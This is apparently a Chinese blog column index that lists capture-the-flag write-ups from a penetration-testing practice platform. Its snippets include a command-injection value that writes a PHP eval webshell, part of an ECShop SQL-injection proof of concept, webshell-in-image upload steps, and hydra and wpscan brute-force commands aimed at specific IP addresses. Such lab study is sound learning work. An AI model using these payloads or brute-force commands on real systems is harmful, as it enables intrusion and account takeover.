![](https://img-blog.csdnimg.cn/ca02d21ce1484668ad72e0a96c5e4e91.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
安鸾渗透实战平台
安鸾渗透实战平台学习笔记(不定期更新,可以订阅专栏防止错过提醒哦!)
阿文、...
这个作者很懒,什么都没留下…
展开
-
安鸾渗透实战平台(CTF训练题) bash (150分)
安鸾渗透实战平台公网vpsxshell(也可以用windows自带的cmd)能连接就行。原创 2023-02-08 16:58:02 · 324 阅读 · 0 评论 -
安鸾渗透实战平台(sql注入) 伪静态&搜索注入 (100分)
安鸾渗透实战平台sqlmapbp。原创 2023-02-08 16:32:15 · 488 阅读 · 0 评论 -
安鸾渗透实战平台(中间件) Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938 ) (150分)
安鸾渗透实战平台公网vps。原创 2023-02-08 14:55:22 · 772 阅读 · 0 评论 -
安鸾渗透实战平台(中间件)tomcat任意文件写入(150分)
安鸾渗透实战平台蚁剑、bp。原创 2023-02-08 12:21:28 · 238 阅读 · 0 评论 -
安鸾渗透实战平台(安全基础)文件类型 (100分)
安鸾渗透实战平台一台Linux虚拟机、一台windows x32虚拟机、解压软件。原创 2023-02-03 14:02:04 · 487 阅读 · 0 评论 -
安鸾渗透实战平台(中间件)tomcat8弱口令 (100分)
安鸾渗透实战平台蚂剑一句话木马(jsp)原创 2023-02-02 18:04:34 · 469 阅读 · 0 评论 -
安鸾渗透实战平台(cms系列)wordpress01 (200分)
安鸾渗透实战平台公网云主机一台(用来接收反弹shell和发送文件)原创 2023-02-02 13:54:34 · 492 阅读 · 0 评论 -
安鸾渗透实战平台——SSRF (600分)
安鸾渗透实战平台——SSRF (600分)原创 2022-08-13 17:25:42 · 694 阅读 · 0 评论 -
安鸾渗透实战平台(文件上传)—— Nginx解析漏洞 (100分)
安鸾渗透实战平台图片、一句话木马中国蚁剑(webshell管理工具)冻手1、准备好图片马(截取一个图片,编辑加入一个一句话木马)2、上传3、从回显的文件路径中截取后面字段4、访问(最开始显示买豆子的图片,我还以为图片没了=.=)5、url后面加上/.php(在的,在的)6、上蚁剑7、找flag1、升级nginx2、修改/etc/php.ini文件,将cgi.fix_pathinfo的值设为0:...原创 2022-06-28 12:49:40 · 1873 阅读 · 1 评论 -
安鸾渗透实战平台(CMS系列)—— ecshop (200分)
漏洞环境安鸾渗透实战平台python 3中国蚁剑(webshell管理工具)题目情况分析1、访问网页,最下面也有版本信息泄露2、信息收集3、找到一个公用POC,用python执行的#!/usr/bin/python# -*- coding: utf-8 -*-import requestsimport timea="554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x原创 2022-04-29 12:53:44 · 2846 阅读 · 2 评论 -
安鸾渗透实战平台(CMS系列)—— Discuz (150分)
漏洞环境安鸾渗透实战平台火狐代理插件(foxyproxy)burp suitepro(抓包工具)中国蚁剑(webshell管理工具)题目情况分析1、访问网页,右下角有CMS版本名称和版本号2、使用搜索引擎去查看历史漏洞3、挑选一个进行测试用一个远程代码执行的:1.Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。2.产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从原创 2022-04-29 12:30:19 · 1974 阅读 · 0 评论 -
安鸾渗透实战平台(基础)—— 指纹识别 (50分)
漏洞环境安鸾渗透实战平台kali (自带whatweb)题目解题kali自带whatweb,不要用什么御剑,不符合题意,他让你用什么是有用意的whatweb -u http://47.100.220.113:8009/原创 2022-04-08 14:35:11 · 2136 阅读 · 0 评论 -
安鸾渗透实战平台(基础)——目录扫描 (100分)
漏洞环境安鸾渗透实战平台kali (自带dirsearch)windows (解压网站备份包)题目下载字典,直接跑dirsearch -u http://47.100.220.113:8008/ -w /root/桌面/dicc.txt -e php -t 1 -m HEAD-u:跟url-w:跟网站目录字典-e:扩展搜索,这里搜索php-t:指定线程-m:指定 请求方式HEAD:一种http请求方式(跟get和post类似),不同的是他只返回请求的响应码,不返回响应的数据内原创 2022-04-08 14:23:11 · 2625 阅读 · 0 评论 -
安鸾渗透实战平台(基础)——Linux基础命令 (100分)
漏洞环境安鸾渗透实战平台windows机器一台(用作ssh登录)题目:使用windows的命令行登录看看情况ssh test@47.100.220.113 -p2233ssh:ssh协议test:用户名47.100.220.113:ip-p:指定端口找文件用ls查看一下啥也没有用ls -all 找到隐藏文件linux中文件前面带.的为隐藏文件我们用cat查看一下获得上卷(九阴真经打钱!)用cd跳到根目录下寻找,提示权限不够cd…cd…find -name原创 2022-04-08 13:32:38 · 3252 阅读 · 0 评论 -
安鸾渗透实战平台——SSH离线破解 (250分)
漏洞环境安鸾渗透实战平台kali(john):linux密码攻击工具详情了解请转到这位师傅的博客:https://www.fujieace.com/kali-linux/courses/john.html题目打开压缩包会得到两个文件字典文件shadow:1、Linux操作系统下有一个文件负责所有用户的密码。那就是shadow;2、/etc/shadow文件中的记录行与/etc/passwd中的一一对应,它由pwconv命令根据/etc/passwd中的数据自动产生。分析shadow文件原创 2022-03-09 01:46:02 · 4829 阅读 · 0 评论 -
安鸾渗透实战平台—— wordpress后台破解 (400分)
漏洞环境安鸾渗透实战平台kali(wpscan)题目信息下载密码文件到kali直接调用wpscanwpscan --url http://118.190.133.35:8090 / -e u -P /home/kali/Desktop/dict.txt程序会自动识别出用户名,并爆破密码成功登录...原创 2022-03-09 00:52:46 · 5916 阅读 · 0 评论 -
安鸾渗透实战平台——一句话密码破解 (250分)
漏洞环境安鸾渗透实战平台kali虚拟机题目信息这里只给了IP,不知道一句话木马的位置,直接上工具跑他的网站目录dirsearch -u 118.190.133.35:8089[04:34:35] Starting: [04:34:36] 200 - 763B - /.git/branches/[04:34:36] 301 - 321B - /.git -> http://118.190.133.35:8089/.git/[04:34:36] 200 - 3KB原创 2022-03-08 22:49:53 · 4701 阅读 · 2 评论 -
安鸾渗透实战平台—— 命令执行01 (100分)
环境安鸾渗透实战平台—— 命令执行01 (100分)菜刀题目写入一句话木马backup.tar.gz;echo '<?php @eval($_POST["666"]); ?>' >shell.phpecho:输出<?php @eval($_POST["666"]); ?>:一句话木马的内容>shell.php:写入到当前目录下的shell.php(没有就创建一个)使用菜刀连接...原创 2022-03-02 20:27:40 · 1012 阅读 · 0 评论 -
安鸾渗透实战平台——暴力破解(Mysql暴力破解 (200分)
漏洞环境安鸾渗透实战平台——暴力破解(Mysql暴力破解)kali虚拟机分析题目1、从图上作者告诉我们要使用MySQL漏洞,最开始没明白是什么意思,去拿MSF的mysql爆破模块去测试了一下,得到密码,拿去使用时出现了问题提示密码错误:又试了几次发现每次爆破的密码都不一样...原创 2022-03-02 16:32:29 · 2367 阅读 · 0 评论 -
安鸾渗透实战平台——暴力破解(telnet服务破解 )
telnet简介:测试连通性,也有用来管理路由交换设备的连通性,如H3C的路由器就可以实现telnet远程管理,只需要输入对应的用户名密码即可。Telnet服务器与Telnet客户端之间需要建立TCP连接,Telnet服务器的缺省端口号为23.实验环境1、安鸾渗透实战平台——暴力破解(telnet服务破解 )2、hydra(kali自带)审题:告诉telnet是:www.whalwl.fun端口是:2323 密码:我猜是admin使用hydra爆破hydra -l admin原创 2022-01-28 02:30:13 · 4477 阅读 · 0 评论 -
安鸾渗透实战平台——暴力破解(FTP服务破解)
第一题破解ftp利用kali中的hydra爆破hydra -l admin -P top100pass.txt ftp://118.190.133.35 -l:表示用户名自定义-L:表示用户名取字典-p:表示密码自定义-P:表示密码取自字典后面跟服务:ftp用ftp工具登录(这里用的是winscp)...原创 2022-01-28 01:41:06 · 4105 阅读 · 0 评论 -
安鸾渗透实战平台—— struts2远程命令执行01 (150分)
漏洞环境安鸾渗透实战平台struts2远程命令执行01: http://www.whalwl.cn/challenge?id=74Struts2漏洞检查工具2018版 V2.1漏洞利用1、来到目标网址随便输入密码并点击登录2、获取上面的urlhttp://106.15.50.112:8088/login/login_CheckLogin.action3、打开工具,填写url并选择对应的漏洞版本号4、获得回显并查看flag...原创 2022-01-27 23:26:50 · 1951 阅读 · 0 评论 -
安鸾渗透实战平台——apache log4j2验证并反弹shell
安鸾渗透实战平台-apache log4j2靶场原创 2022-01-27 20:08:29 · 2538 阅读 · 0 评论 -
安鸾渗透实战平台---文件上传01
安鸾渗透实战平台——文件上传011、访问2、找到上传点,全部都试了,就这里可以上传3、准备木马,并把后缀改成.jpg,因为上传php时提示jpg,所以他应该做了过滤4、我猜他是前端过滤,我这里抓个包,从数据包中把他的后缀改回来找到目标 bp监听,浏览器点击上传改成php上传成功,这里我们发现了一个黑点,我们试试访问他的地址找到了上传路径由于是.php所以直接上蚁剑连接成功找到flag.txt去看看,即可得到flag...原创 2021-05-15 02:19:24 · 1059 阅读 · 0 评论